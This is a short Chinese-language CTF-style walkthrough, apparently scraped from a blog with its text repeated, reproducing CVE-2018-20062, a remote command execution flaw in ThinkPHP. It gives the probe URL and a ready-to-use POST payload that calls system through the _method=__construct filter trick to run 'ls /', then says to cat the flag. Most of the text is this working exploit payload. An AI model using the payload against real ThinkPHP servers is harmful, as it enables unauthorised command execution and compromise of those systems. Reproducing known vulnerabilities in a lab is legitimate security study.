CVE-2018-20062
CVE-2018-20062复现
打开网站
判断是否存在漏洞,访问/index.php?s=captcha页面,会出现报错
利用post请求,执行命令
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls /
cat查看flag
CVE-2018-20062复现
打开网站
判断是否存在漏洞,访问/index.php?s=captcha页面,会出现报错
利用post请求,执行命令
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls /
cat查看flag
浙公网安备 33010602011771号